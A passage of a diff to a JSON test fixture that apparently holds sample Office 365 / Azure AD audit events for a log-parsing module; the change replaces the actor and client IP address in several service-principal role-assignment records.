Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1763,9 +1763,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:06", "ExtendedProperties": [ { @@ -1999,7 +1999,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2029,9 +2029,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:06", "ExtendedProperties": [ { @@ -2265,7 +2265,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\